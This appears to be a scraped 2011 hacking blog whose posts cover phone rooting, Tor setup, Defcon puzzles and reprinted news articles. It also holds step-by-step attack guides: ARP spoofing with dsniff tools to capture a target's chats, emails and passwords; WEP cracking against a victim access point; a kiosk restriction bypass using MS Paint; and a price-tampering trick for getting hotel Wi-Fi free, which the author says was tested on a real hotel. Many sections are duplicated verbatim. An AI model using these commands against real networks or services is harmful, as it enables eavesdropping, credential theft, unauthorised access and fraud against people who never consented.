These are the command line tools we will be using to spoof our subject into thinking that we are the router, therefore sending all its network traffice request through us.
Tools: dsniff suite and driftnet.
on Ubuntu: apt-get install driftnet dsniff
Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our subjects to flow through our machine. We need to switch on ip_forwarding.
1. To check the current setting type: cat /proc/sys/net/ipv4/ip_forward
if you get a "0", it is currently off.
2. Type the ff to turn it on: echo 1 > /proc/sys/net/ipv4/ip_forward
"1" being to switch it on.
3. Then you can check again: cat /proc/sys/net/ipv4/ip_forward
4. Now we have to setup the traffic flow using arpspoof. the switch "-t" means target.
arpspoof -t 10.10.10.1 10.10.10.99 - watch traffic from x.x.x.1 (router) to x.x.x.99 (host)
we'll also to the reverse to watch traffic going the opposite direction:
arpspoof -t 10.10.10.99 10.10.10.1
5. Let the fun begin: OverLord!
msgsnarf -i eth0 - will watch chat sessions and messenger clients (yahoo,gmail,irc...etc)
urlsnart -i eth0 - will URL used by the subject
mailsnarf -i eth0 - will watch for emails
dnsiff -i eth0 - will watch for passwords
driftnet -i eth0 - will watch for pictures on the net
6. To shut down all: killall arpspoof
2011-08-31
2011-08-30
Crack a WEP!
I've been trying different combinations of cracking a WEP key. Each "experiment" requires a different strategy, each subject needs to be poked a little different from the other. The instructions below might or might not work. But it does work most of the time. It works very well when a client is connected to the AP, but of course you can fake that also.
I recommend changing you monitoring interface's MAC address for anonymity and to make is easy to remember - example 11:22:33:44:55:66 You can use MACCHANGER if needed.
1. set the interface in monitor mode - airmon-ng [interface]
2. to recon the air waves use airodump-ng: airodump-ng [interface]
3. pick the victim and take note of the SSID, channel and mac address.
4. stop airodump-ng, then restart it with the write option to start catching the IVs. - airodump-ng -c [channel] -w [filename] [interface]
5. Now we need to inject some "care packages" to generate some IV's. This is were you should get creative. Take your pick.
NOTE: to test the subjects's ability for packet injection, use the following code. you are looking for a 100% injection result - aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
fake associations for the vic. ap
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface] or use this for picky access points
aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
you have to get a successful association before you can continue. your ARP request replay packets will not generate any IV's if you are not associated with the AP. send out ARP request replay modes
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
6. Start cracking -aircrack-ng [filename] pick the vic SSID then go.
Note: you can use the FMS/Korek method by adding -K on the code above.
You will need approx. 250,000 IV's for a 64 bit key, 1.5M IV's for a 128 bit key. for the PTW method, you'll need 20,000 packets for 64bit and 40,000 packets for 128bits.
"This is strictly for educational purposes only. Setup you own lap or crack you own Wifi for pen testing purposes.
I recommend changing you monitoring interface's MAC address for anonymity and to make is easy to remember - example 11:22:33:44:55:66 You can use MACCHANGER if needed.
1. set the interface in monitor mode - airmon-ng [interface]
2. to recon the air waves use airodump-ng: airodump-ng [interface]
3. pick the victim and take note of the SSID, channel and mac address.
4. stop airodump-ng, then restart it with the write option to start catching the IVs. - airodump-ng -c [channel] -w [filename] [interface]
5. Now we need to inject some "care packages" to generate some IV's. This is were you should get creative. Take your pick.
NOTE: to test the subjects's ability for packet injection, use the following code. you are looking for a 100% injection result - aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
fake associations for the vic. ap
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface] or use this for picky access points
aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
you have to get a successful association before you can continue. your ARP request replay packets will not generate any IV's if you are not associated with the AP. send out ARP request replay modes
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
6. Start cracking -aircrack-ng [filename] pick the vic SSID then go.
Note: you can use the FMS/Korek method by adding -K on the code above.
You will need approx. 250,000 IV's for a 64 bit key, 1.5M IV's for a 128 bit key. for the PTW method, you'll need 20,000 packets for 64bit and 40,000 packets for 128bits.
"This is strictly for educational purposes only. Setup you own lap or crack you own Wifi for pen testing purposes.
2011-08-26
Root the AT&T Inspire 4G
THIS GUIDE HAS NOT BEEN TESTED. PLEASE DO YOUR RESEARCH BEFORE TO PREVENT BRICKING YOUR PHONE. THIS IS A WORK IN PROGRESS.
This guide will walk you through the process of taking the AT&T Inspire 4G from stock to having the ability to flash a custom recovery image & the latest version of CyanogenMod.
STEP 1: Before you do anything — Make a backup
Don't forget to back up your data. If you synced the device with a Google account, then the contacts, calendar, Gmail, & select other Google-related data will not be lost and will come back when you sync your phone to Google.
However, you should backup anything you want to keep that is not stored on the SD card: SMS/MMS messages, Call Log, Bookmarks, Applications, pictures...etc.
You can use Titanium Backup or the Astro File Manager. Any application data not on the SD card will be lost. It would also be a good idea to backup everything stored on the SD card in the rare case the SD card must be formatted to resolve any major problems. MyBackup Root, SMS Backup & Restore, and Call Backup & Restore are all free applications that can assist with backing up your data.
STEP 2: Root the HTC Inspire 4G - AT&T
Rooting the AT&T Inspire 4GWarning: Rooting the AT&T Inspire 4G will void the warranty.
2.1 Downgrade to 1.32.405.6 - To root the AT&T Inspire 4G you need to downgrade the device to a copy of the firmware on the international HTC Desire HD. Download the firmware to your PC.
2.2 Create a goldcard - In order to downgrade the AT&T Inspire 4G to the firmware of the HTC Desire HD, you will need to create a goldcard.
2.3 You will need an ADB shell on your PC - Follow the Android SDK guide, to get the ADB shell on the computer.
2011.0914: Installation of the Android SDK and ADB is not included in this guide. You can google how to install those two, and you will find a number of instructions. there are a few caveats you have to be aware of.
- Android SDK Installation bug: Download the Android SDK and the JAVA SE. Start by installing JAVA. It should be straight forward no fuss installation. Then install the Android SDK, if you are running Win 7, right-click the installation file and "Run as Administrator". This simple step eliminates a lot of issues during installation.
The Android SDK installer will tell you that you do not have the Java SE installed, you right genius!!! Simple fix: click "Back" - to bring you to the previous installation page, the click "Next". The installer should now pick-up the installed Java SE kit.
2011.0914: Installation of the Android SDK and ADB is not included in this guide. You can google how to install those two, and you will find a number of instructions. there are a few caveats you have to be aware of.
- Android SDK Installation bug: Download the Android SDK and the JAVA SE. Start by installing JAVA. It should be straight forward no fuss installation. Then install the Android SDK, if you are running Win 7, right-click the installation file and "Run as Administrator". This simple step eliminates a lot of issues during installation.
The Android SDK installer will tell you that you do not have the Java SE installed, you right genius!!! Simple fix: click "Back" - to bring you to the previous installation page, the click "Next". The installer should now pick-up the installed Java SE kit.
2.4 Download psneuter, misc_version 0.01 & the 1.32.405.6 firmware:
psneuter (md5: 89c2dec8d72d87b4c669f44dd31c8d17)
misc_version 0.02 (md5: 1f40aaf88d1bf15775631a58c4361218)
1.32.405.6 firmware (md5: d5067eaad6d447797a67828b567901af)
2.5 Unzip the psneuter & misc_version package to the same folder as adb (the /platform-tools folder within the Android SDK folder).
2.6 Connect the AT&T Inspire 4G to the computer via USB. On the computer, open the terminal and run the following commands:
adb push psneuter /data/local/tmp/
adb push misc_version /data/local/tmp/
adb shell chmod 777 /data/local/tmp/psneuter
adb shell chmod 777 /data/local/tmp/misc_version
adb shell /data/local/tmp/psneuter
adb shell /data/local/tmp/misc_version -s 1.31.405.3
exit
[NOTE: You should have the "#" sign instead of the "$". If you do, you have temporary root, and can continue on.]
2.7 Copy the 1.32.405.6 firmware to the root of the SD card (NOT in any folders).
On the computer, open terminal and run the following command:
adb reboot bootloader
2.8 Uninstall VISIONary if it is installed on the HTC Inspire.
2.9 Follow the on screen directions for flashing the 1.32.405.6 firmware. Once finished you can can continue to the next section - Root, S-OFF, the ClockworkMod Recovery & the Engineering HBoot
2.10 You will need ADB on the computer to root the AT&T Inspire 4G and to flash the necessary files for radio S-OFF. Follow the Android SDK guide, to get the ADB shell on the computer.
2.11 Download busybox, the ClockworkMod Recovery, the Engineering HBoot, gfree 0.07, psneuter, root_psn, Superuser package:
busybox: (md5: 25c5db694c987995909cc3166d4f01b0)
ClockworkMod Recovery ()
Engineering HBoot: (md5: b2c8834905bfa2349f5223077493140a)
gfree 0.7: (md5: 6916cf05b0805aeac9effdc1725aaa12)
psneuter: (md5: 89c2dec8d72d87b4c669f44dd31c8d17)
root_psn: (md5: c8fe38ef55eb8951def9ff17b2eb99c1)
Superuser package: (md5: 43d9a40b63e916635d5ad7ca32433fab)
2.12 Unzip the zip files and copy the contents to the same folder as adb (the /platform-tools folder within the Android SDK folder). Connect the AT&T Inspire 4G to the computer via USB. Make sure USB debugging is enabled on the AT&T Inspire 4G by checking Settings » Applications » Development » USB debugging.
2.13 On the computer, open terminal and run the following commands:
adb push busybox /data/local/tmp/
adb push gfree /data/local/tmp/
adb push hboot-eng.img /data/local/tmp/
adb push psneuter /data/local/tmp/
adb push recovery-clockwork-3.0.2.6-ace.img /data/local/tmp/recovery.img
adb push root_psn /data/local/tmp/
adb push su /sdcard/
adb push Superuser
apk /sdcard/
adb shell
chmod 755 /data/local/tmp/*
/data/local/tmp/psneuter
NOTE: You will drop out of the shell after this command.
Restart the shell using:
adb shell
cd /data/local/tmp
./busybox md5sum /dev/block/mmcblk0p18
[Write down this number, we will need it later. For the remainder of this guide, we will refer to this number md5 #1.]
./gfree -f -b hboot-eng.img -y recovery.img ./root_psn sync
[This may take a moment, just give it some time.]
./busybox md5sum hboot-eng.img
[Write down this number - this will be md5 #2]
./busybox md5sum /dev/block/mmcblk0p18
[Write this number down - this will be number md5 #3]
If md5 #1 & md5 #3 match, then gfree 0.07 failed to powercycle the eMMC chip on the device. Either the software version is too high and the device was not downgraded per the previous section, or you have to use the gfree 0.05 instead. Download gfree 0.05, reboot and attempt again.
gfree 0.5: [md5: 74aec166f591ec5d25d898a903570931]
If md5 #2 & md5 #3 match, then everything should be fine and you continue on. If md5 #3 does NOT match md5 #1 or md5 #2, then DO NOT REBOOT and join #G2Root on Freenode for further help.
2.14 reboot
The AT&T Inspire 4G is now rooted with S-OFF, the Engineering HBoot & the ClockworkMod Recovery. 3 Flashing a Radio & CyanogenMod
./busybox md5sum /dev/block/mmcblk0p18
[Write down this number, we will need it later. For the remainder of this guide, we will refer to this number md5 #1.]
./gfree -f -b hboot-eng.img -y recovery.img ./root_psn sync
[This may take a moment, just give it some time.]
./busybox md5sum hboot-eng.img
[Write down this number - this will be md5 #2]
./busybox md5sum /dev/block/mmcblk0p18
[Write this number down - this will be number md5 #3]
If md5 #1 & md5 #3 match, then gfree 0.07 failed to powercycle the eMMC chip on the device. Either the software version is too high and the device was not downgraded per the previous section, or you have to use the gfree 0.05 instead. Download gfree 0.05, reboot and attempt again.
gfree 0.5: [md5: 74aec166f591ec5d25d898a903570931]
If md5 #2 & md5 #3 match, then everything should be fine and you continue on. If md5 #3 does NOT match md5 #1 or md5 #2, then DO NOT REBOOT and join #G2Root on Freenode for further help.
2.14 reboot
The AT&T Inspire 4G is now rooted with S-OFF, the Engineering HBoot & the ClockworkMod Recovery. 3 Flashing a Radio & CyanogenMod
STEP 3: Flashing CyanogenMod
----------------------------------------
Method via RecoveryDownload the latest version of CyanogenMod.
Optional:
Download the Google Apps for the device.
Place the CyanogenMod update.zip file on the root of the SD card.
Optional:
Place the Google Apps .zip on the root of the SD card also.
Boot into the ClockworkMod Recovery.
Once the device boots into the ClockworkMod Recovery, use the side volume buttons to move around, and either the power button or the trackball to select.
Optional:
Select backup and restore to create a backup of current installation on the HTC Ace.
Select the option to Wipe data/factory reset.
Then select the option to Wipe cache partition.
Select Install zip from sdcard.
Select Choose zip from sdcard.
Select the CyanogenMod update.zip.
Optional:
Install the Google Apps by performing steps 7 - 9 again and choosing the Google Apps update.zip. Once the installation has finished, select +++++Go Back+++++ to get back to the main menu, and select the Reboot system now option. The HTC Ace should now boot into CyanogenMod.
***
Method via ROM ManagerLaunch RomManager.
Optional:
Choose the first option in the app, Flash ClockworkMod Recovery to update to the latest version.
Select the Download ROM option from the main menu in the ROM Manager.
Select the CyanogenMod option, and then choose the latest version of CyanogenMod from the menu.
Optional:
When you select the latest version of CyanogenMod, check the Google Apps* option. Once the ROM is finished downloading, it asks if you would like to Backup Existing ROM and Wipe Data and Cache. If Superuser prompts for root permissions check to Remember and then Allow.
The HTC Ace will now reboot into the recovery, wipe data and cache, and then install CyanogenMod. When it's finished installing it will reboot into CyanogenMod.
Retrieved from Wiki CyanoGenMod - AT&T Inspire 4G: Rooting
******
Additional Rooting resources I found on the web. These are untested, but review them for reference and a better understanding of the process:
HTC Inspire 4G Simple Root and S-Off
AndroidAuthority.com (how-to-root-att-inspire-4g)
PhonesArchive.com (how-to-root-your-atat-htc-inspire-4g-tutorial)
2011-08-25
Tor on BT5 (squeeze/sid)
Check your BT5 version: cat /etc/debian_version
You can also display the distribution version by: lsb_release -a
According to the author, the instructions are for the "squeeze" version of BT5.
C&P from http://www.binbert.com/blog/2011/06/how-to-install-tor-on-backtrack-5/
kudos to the writer, although I have not tested this on my own, it looks good.
Tor is an open source Anonymous Internet tool. It protects your personal identification from tracking systems by changing the source IP address frequently. Application will create many virtual tunnels through the tor network.
By default Tor is not integrated in BackTrack 5. Why use Tor on Backtrack ? Normally Tor is used to protect the browsing security but Tor can be used for network scanning tools and other information gathering tools, in my next article i will explain how to configure Tor for console applications.
Follow the installation steps:
Open /etc/apt/sources.list file and add following line
deb http://deb.torproject.org/torproject.org squeeze main
if you have "lucid", you can try to enter: deb http://deb.torproject.org/torproject.org lucid main
Open command prompt and run following commands
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
apt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy
After installing Privoxy, Open /etc/privoxy/config and append follwing line
forward-socks4a / 127.0.0.1:9050
/etc/init.d/privoxy start
Configure your clients with Ip address 127.0.0.1 and port 8118
To check if you are on the onion network, go to http://cmyip.com or http://www.whatismyip.com to know your current ip address.
You can also display the distribution version by: lsb_release -a
According to the author, the instructions are for the "squeeze" version of BT5.
C&P from http://www.binbert.com/blog/2011/06/how-to-install-tor-on-backtrack-5/
kudos to the writer, although I have not tested this on my own, it looks good.
Tor is an open source Anonymous Internet tool. It protects your personal identification from tracking systems by changing the source IP address frequently. Application will create many virtual tunnels through the tor network.
By default Tor is not integrated in BackTrack 5. Why use Tor on Backtrack ? Normally Tor is used to protect the browsing security but Tor can be used for network scanning tools and other information gathering tools, in my next article i will explain how to configure Tor for console applications.
Follow the installation steps:
Open /etc/apt/sources.list file and add following line
deb http://deb.torproject.org/torproject.org squeeze main
if you have "lucid", you can try to enter: deb http://deb.torproject.org/torproject.org lucid main
Open command prompt and run following commands
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
apt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy
After installing Privoxy, Open /etc/privoxy/config and append follwing line
forward-socks4a / 127.0.0.1:9050
/etc/init.d/privoxy start
Configure your clients with Ip address 127.0.0.1 and port 8118
To check if you are on the onion network, go to http://cmyip.com or http://www.whatismyip.com to know your current ip address.
2011-08-24
Access a Windows Shell from MS Paint (Windows 7)
Bypass restrictions, like Group Policies setup by network administrator, and get to the shell by using MS Paint. This is handy if the command prompt is hidden from a kiosk machine and you have access to MS Paint. Of course, after you get to the shell, you will still need to know what to do with it to "test" stuff.
There is a certain image size with the correct combination of RGB entries that will allow you to get to generate a file which basically fires up the Windows shell. Here we go.
1. Fire up MS Paint.
2. Create a new image. Change the size of the image to, in "Image Properties", to (width) Wide = 6 and (height) Tall = 1' (6x1 pixels)
3. Zoom in to the image, then Edit the colors (see below)
4. You will need to create 4 custom colors to fill up the image 1 pixel at a time, 6 times. Use 1 of the custom colors for each pixel. The color settings for
each pixel is listed below.
(1st pixel)
Red = 10
Green = 0
Blue = 0
(2nd pixel)
Red =13
Green =10
Blue = 13
(3rd pixel)
Red =100
Green =109
Blue = 99
(4th pixel)
Red =120
Green =101
Blue = 46
(5th pixel)
Red =0
Green =0
Blue = 101
(6th pixel)
Red =0
Green =0
Blue = 0
5. Save this as a bitmap file (24-bit Bitmap (*.bmp)) - name it "command.bmp"
6. Rename the "command.bmp" file to "command.bat"
Notable Tools:
mh-nexus.de/en/hxd (for Windows) - you can actually edit the hex and add additional commands after cmd to customize the batch file. Nifty little trick, you just have to remember 6 sets of RBG values. peace out! pentest responsibly!
There is a certain image size with the correct combination of RGB entries that will allow you to get to generate a file which basically fires up the Windows shell. Here we go.
1. Fire up MS Paint.
2. Create a new image. Change the size of the image to, in "Image Properties", to (width) Wide = 6 and (height) Tall = 1' (6x1 pixels)
3. Zoom in to the image, then Edit the colors (see below)
4. You will need to create 4 custom colors to fill up the image 1 pixel at a time, 6 times. Use 1 of the custom colors for each pixel. The color settings for
each pixel is listed below.
(1st pixel)
Red = 10
Green = 0
Blue = 0
(2nd pixel)
Red =13
Green =10
Blue = 13
(3rd pixel)
Red =100
Green =109
Blue = 99
(4th pixel)
Red =120
Green =101
Blue = 46
(5th pixel)
Red =0
Green =0
Blue = 101
(6th pixel)
Red =0
Green =0
Blue = 0
5. Save this as a bitmap file (24-bit Bitmap (*.bmp)) - name it "command.bmp"
6. Rename the "command.bmp" file to "command.bat"
Notable Tools:
mh-nexus.de/en/hxd (for Windows) - you can actually edit the hex and add additional commands after cmd to customize the batch file. Nifty little trick, you just have to remember 6 sets of RBG values. peace out! pentest responsibly!
2011-08-19
Complimentary Wifi for You and Me.
Successfully tested in Hilton Honors Hotel Wifi. Yes, I know, I know... wifi should be free for everyone. All a decent geek wants to do on a vacation is information where he can spend his money... food, entertainment and shopping. Internet information is crucial to get this information. Yes, I know what you are thinking... use the office mifi? or broadband mobile connection... oh yeah? not business related? So here's how, it's simpler than you think... a total no brainer and totally the fault of the designer of the website.... there is absolutely no security. Believe me, I've tested this and it works.
tools needed: Firefox with Firebug add-on.
1. fire up firefox, and the hotel website shows up. it'll have a choice of connection length and cost for each.
2. for initial testing purposes, pick the cheapest choice ($2.95 for an hour).
3. choose "bill-to-room"
4. for the last name and room, type in a bogus last name (ex. BUNNYBEAR). - do not use your real last name on this round. The purpose of this is to stop the process midway so we can inject our changes.
5. for the room number, enter your real room number.
6. press connect, and a page will show up with the summary of your bill - $2.95 for 1 hour, but an error will show saying that the last name does not match with the room number.
7. activate FireBug, and navigate to the HTML tab. (note: activate on a new window)
8. search for "2.95", Firebug search should find it by the "value=2.95" code. change the calue to "0.00".
9. go back to the web page. at this point it should still say $2.95 on the cost. there should be 2 buttons at the bottom of the web page, "BACK" and "CONNECT", click - CONNECT.
10. once again it will try to connect but since the last name is still wrong, it will go back to the error page. But now check the total amount, it is now "Complimentary".
11. now change the last name to the correct last name registered to the room number...click connect, and welcome to the jungle!
NOTES: I have not tried this on the higher priced options, but I figure the logic is the same and it should work as well. Now why did this work, just like what I have preached before... sequence of events.
1. Initial page with options, created and choices packaged into the next page. The initial page usually have coupons and complimentary code options on it.
2. The 2nd page bundles the options for evaluation and confirmation to the connection page.
3. We modified the 2nd page to change the cost and but made sure that half the info fails validation (wrong last name). This regenerates the 2nd page to now have a complimentary cost on a legitimate page.
4. after we correct the last name, all the info on the page is now accurate and should pass the confirmation. in essence the web site itself re-packaged the whole page to go through properly. game over.pwned. trip ninja. 3l33t.
The intent of this blog entry is to pentest and see if this bug is still out there, and it is. this is not for financial gain or stealing, I am not a black hat. it's just amazing that until now they still have this bug. this hole in shopping carts have been discussed at least 10 years ago, just incredible.
tools needed: Firefox with Firebug add-on.
1. fire up firefox, and the hotel website shows up. it'll have a choice of connection length and cost for each.
2. for initial testing purposes, pick the cheapest choice ($2.95 for an hour).
3. choose "bill-to-room"
4. for the last name and room, type in a bogus last name (ex. BUNNYBEAR). - do not use your real last name on this round. The purpose of this is to stop the process midway so we can inject our changes.
5. for the room number, enter your real room number.
6. press connect, and a page will show up with the summary of your bill - $2.95 for 1 hour, but an error will show saying that the last name does not match with the room number.
7. activate FireBug, and navigate to the HTML tab. (note: activate on a new window)
8. search for "2.95", Firebug search should find it by the "value=2.95" code. change the calue to "0.00".
9. go back to the web page. at this point it should still say $2.95 on the cost. there should be 2 buttons at the bottom of the web page, "BACK" and "CONNECT", click - CONNECT.
10. once again it will try to connect but since the last name is still wrong, it will go back to the error page. But now check the total amount, it is now "Complimentary".
11. now change the last name to the correct last name registered to the room number...click connect, and welcome to the jungle!
NOTES: I have not tried this on the higher priced options, but I figure the logic is the same and it should work as well. Now why did this work, just like what I have preached before... sequence of events.
1. Initial page with options, created and choices packaged into the next page. The initial page usually have coupons and complimentary code options on it.
2. The 2nd page bundles the options for evaluation and confirmation to the connection page.
3. We modified the 2nd page to change the cost and but made sure that half the info fails validation (wrong last name). This regenerates the 2nd page to now have a complimentary cost on a legitimate page.
4. after we correct the last name, all the info on the page is now accurate and should pass the confirmation. in essence the web site itself re-packaged the whole page to go through properly. game over.pwned. trip ninja. 3l33t.
The intent of this blog entry is to pentest and see if this bug is still out there, and it is. this is not for financial gain or stealing, I am not a black hat. it's just amazing that until now they still have this bug. this hole in shopping carts have been discussed at least 10 years ago, just incredible.
2011-08-10
Defcon 19 Badge and Lanyard
On my previous blog I have mentioned about the binary code and titanium badges. They both hold clues to something. The Defcon program also holds a number of clues. Here's a pic of this year's badge - Defcon 19 Badge
Defcon 19 Random Numbers on Posters
Clues maybe? Here they are in case you were not able to get them last weekend. Found at the bottom of a few Defcon posters, they were easy to miss. Unless, you ran into a small crowd staring at them...
Top Row: 35 4 24 4 29 4 104 62 33 104 4 56 24 47 62 33 104 4 56 24 47 62 69 4 16 47 62 64 104 56 84 4 73 4 84 69 84 24 24 58 35 64 104 99 64 29 56 24 47
Bottom Row: 62 69 4 84 11 35 99 4 62 4 104 99 4 4 56 4 84 33 16 58 69 94 4 69 69 33 39 4 104 99 4 62 4 99 24 45 24 4 69 104 99 47 1 24 11 99 24 62 62 24 62
Here's a picture of how it looked like on the poster itself Defcon 19 Poster
Top Row: 35 4 24 4 29 4 104 62 33 104 4 56 24 47 62 33 104 4 56 24 47 62 69 4 16 47 62 64 104 56 84 4 73 4 84 69 84 24 24 58 35 64 104 99 64 29 56 24 47
Bottom Row: 62 69 4 84 11 35 99 4 62 4 104 99 4 4 56 4 84 33 16 58 69 94 4 69 69 33 39 4 104 99 4 62 4 99 24 45 24 4 69 104 99 47 1 24 11 99 24 62 62 24 62
Here's a picture of how it looked like on the poster itself Defcon 19 Poster
2011-08-09
Hacking encouraged at Defcon hacker convention
a Defcon 19 article from Reuters
LAS VEGAS: There was a whole lot of hacking going on in Sin City this weekend – and right under the noses of federal agents.
But in a sign of a time when cybersecurity is at the forefront of national security concerns, the feds were not lurking in the shadows to keep a watchful eye. They came as invited guests at the Defcon hacker convention in Las Vegas, which drew more than 10,000 attendees in its 19th year.
At Defcon, computer wizards test their skills against each other for bragging rights and prizes. No name tags are issued and hackers identify themselves only by one-word handles.
High-profile attacks on government and corporate computer systems disclosed this summer have pushed hackers increasingly into the public eye. Meanwhile, government agencies are wooing hackers to join them in fighting such intrusions.
The Defcon crowd made for an interesting mix.
It had its fair share of mohawk haircuts that would make a rainbow proud, along with tattoos and piercings but it mostly looked like a campus of geeks let loose in a Las Vegas hotel to do what they consider fun: decipher mind-bending puzzles, starting with the convention badge.
Made of titanium – organizers say they depleted the country’s stock of the raw material – the badge had a cut-out of the Egyptian mathematical symbol the Eye of Ra, and a letter and number. It offered a clue to a puzzle.
Other clues were contained in a large decoder wheel on the floor where a golden pyramid with symbols was encircled by letters coupled with numbers. More clues were salted in the program booklet and strewn throughout the convention center.
A hacker who goes by the moniker “LosT” designed the game and offered some helpful hints: 10 people had badges with a Z and a number. Oh, and find someone to translate Chinese.
“I pulled in so many different disciplines that no single person can really do it by themselves unless they are a weirdo like me,” said LosT, an engaging mathematician/engineer with blue hair and a goatee.
GETTING A BAD RAP?
The game illustrates the intellect of the attendees, who see hacking as a skill for problem-solving and do not welcome the notoriety generated by some bad apples breaking laws.
Hackers are “people who like a challenge. We don’t do crime, we’re not criminals,” said “mournewind” from West Virginia. “People have this opinion that hackers do illegal things and that’s not really a good thing.”
Hacking, for example, can help improve commercial products, he said. “We break an iPhone to make Apple make it better.”
Hackers pointed out that criminals exist in all professions and they should not all be painted by that broad brush.
“I think hackers have always gotten a bad name,” said “pwrcycle,” whose business card labels him an “Ethical Hacker.”
“Those are the people who think outside the box. The epitome of free thinkers.”
He objected to the term “cyber wars,” saying there was danger in calling what was essentially a crime in which no one died a war, with its suggestion that military might could be used on basically thugs, bullies and mobsters.
“What most people are trying to say is we want to stop espionage,” he said. “He’s not trying to kill you, he just wants to pick your pocket.”
At the start of a panel of cyber investigators from the Air Force, Navy, Army and NASA, a burly man called “Priest,” who said he entered government service after the September 11 terrorist attacks, advised the audience that if they wanted a government job the key was to stay out of jail, go to college and not do drugs.
The panelists said there was a debate in their world about whether it was better to turn a cop into a cyber specialist or turn an information technology expert into a cop.
“I think you just need to be a geek who knows how to talk to people,” said Ahmed Saleh, special agent in NASA’s computer crimes division.
“We have a little bit of both. We have a little bit of the geeks who became cops and the cops who became geeks, or nerds or whatever words you want to use,” he said.
The panel started with a “spot the Fed” contest in which the audience had to guess which of four women on stage was a federal agent.
Most of the audience picked the one who said her favorite president was Ronald Reagan. Wrong. It was the one who said her childhood dream was to be a pilot.
LET THE GAMES BEGIN
One sure way to catch the attention of would-be employers is to win the prestigious “Capture The Flag” contest.
This year 12 teams huddled with laptops in a low-lit room all day, hacking each other.
The competition is all about “attack and defense,” explained “Factor,” who was part of the defending champion team ACME Pharm. The attacker’s goal is to find vulnerabilities
while the defender tries to to prevent the holes from being exploited.
“You are amongst gods,” Factor said. “This is the Olympics.”
He shrugged off as “hype” the negative image of hackers as criminals and said the public should not believe everything it reads.
“There are good hackers, there are bad hackers,” he said. “And some of us have kids.”
Other competitions included “Hacker Jeopardy,” “Crack Me If You Can” and “Hack Fortress.”
But one required absolutely no computer savvy and got a little hairy — best beard, mustache, partial beard, and fake beard.
LAS VEGAS: There was a whole lot of hacking going on in Sin City this weekend – and right under the noses of federal agents.
But in a sign of a time when cybersecurity is at the forefront of national security concerns, the feds were not lurking in the shadows to keep a watchful eye. They came as invited guests at the Defcon hacker convention in Las Vegas, which drew more than 10,000 attendees in its 19th year.
At Defcon, computer wizards test their skills against each other for bragging rights and prizes. No name tags are issued and hackers identify themselves only by one-word handles.
High-profile attacks on government and corporate computer systems disclosed this summer have pushed hackers increasingly into the public eye. Meanwhile, government agencies are wooing hackers to join them in fighting such intrusions.
The Defcon crowd made for an interesting mix.
It had its fair share of mohawk haircuts that would make a rainbow proud, along with tattoos and piercings but it mostly looked like a campus of geeks let loose in a Las Vegas hotel to do what they consider fun: decipher mind-bending puzzles, starting with the convention badge.
Made of titanium – organizers say they depleted the country’s stock of the raw material – the badge had a cut-out of the Egyptian mathematical symbol the Eye of Ra, and a letter and number. It offered a clue to a puzzle.
Other clues were contained in a large decoder wheel on the floor where a golden pyramid with symbols was encircled by letters coupled with numbers. More clues were salted in the program booklet and strewn throughout the convention center.
A hacker who goes by the moniker “LosT” designed the game and offered some helpful hints: 10 people had badges with a Z and a number. Oh, and find someone to translate Chinese.
“I pulled in so many different disciplines that no single person can really do it by themselves unless they are a weirdo like me,” said LosT, an engaging mathematician/engineer with blue hair and a goatee.
GETTING A BAD RAP?
The game illustrates the intellect of the attendees, who see hacking as a skill for problem-solving and do not welcome the notoriety generated by some bad apples breaking laws.
Hackers are “people who like a challenge. We don’t do crime, we’re not criminals,” said “mournewind” from West Virginia. “People have this opinion that hackers do illegal things and that’s not really a good thing.”
Hacking, for example, can help improve commercial products, he said. “We break an iPhone to make Apple make it better.”
Hackers pointed out that criminals exist in all professions and they should not all be painted by that broad brush.
“I think hackers have always gotten a bad name,” said “pwrcycle,” whose business card labels him an “Ethical Hacker.”
“Those are the people who think outside the box. The epitome of free thinkers.”
He objected to the term “cyber wars,” saying there was danger in calling what was essentially a crime in which no one died a war, with its suggestion that military might could be used on basically thugs, bullies and mobsters.
“What most people are trying to say is we want to stop espionage,” he said. “He’s not trying to kill you, he just wants to pick your pocket.”
At the start of a panel of cyber investigators from the Air Force, Navy, Army and NASA, a burly man called “Priest,” who said he entered government service after the September 11 terrorist attacks, advised the audience that if they wanted a government job the key was to stay out of jail, go to college and not do drugs.
The panelists said there was a debate in their world about whether it was better to turn a cop into a cyber specialist or turn an information technology expert into a cop.
“I think you just need to be a geek who knows how to talk to people,” said Ahmed Saleh, special agent in NASA’s computer crimes division.
“We have a little bit of both. We have a little bit of the geeks who became cops and the cops who became geeks, or nerds or whatever words you want to use,” he said.
The panel started with a “spot the Fed” contest in which the audience had to guess which of four women on stage was a federal agent.
Most of the audience picked the one who said her favorite president was Ronald Reagan. Wrong. It was the one who said her childhood dream was to be a pilot.
LET THE GAMES BEGIN
One sure way to catch the attention of would-be employers is to win the prestigious “Capture The Flag” contest.
This year 12 teams huddled with laptops in a low-lit room all day, hacking each other.
The competition is all about “attack and defense,” explained “Factor,” who was part of the defending champion team ACME Pharm. The attacker’s goal is to find vulnerabilities
while the defender tries to to prevent the holes from being exploited.
“You are amongst gods,” Factor said. “This is the Olympics.”
He shrugged off as “hype” the negative image of hackers as criminals and said the public should not believe everything it reads.
“There are good hackers, there are bad hackers,” he said. “And some of us have kids.”
Other competitions included “Hacker Jeopardy,” “Crack Me If You Can” and “Hack Fortress.”
But one required absolutely no computer savvy and got a little hairy — best beard, mustache, partial beard, and fake beard.
BlackBerry blog hacked after RIM helps police in London riots
From LA Times by Nathan Olivarez-Giles
Research In Motion's Inside BlackBerry blog was hacked on Tuesday after the Canadian smartphone maker said it would cooperate with London police who are investigating the role of BlackBerry users in the city's last three days of riots.
In a message on Twitter on Monday, RIM said that the company feels "for those impacted by the riots in London. We have engaged with the authorities to assist in any way we can."
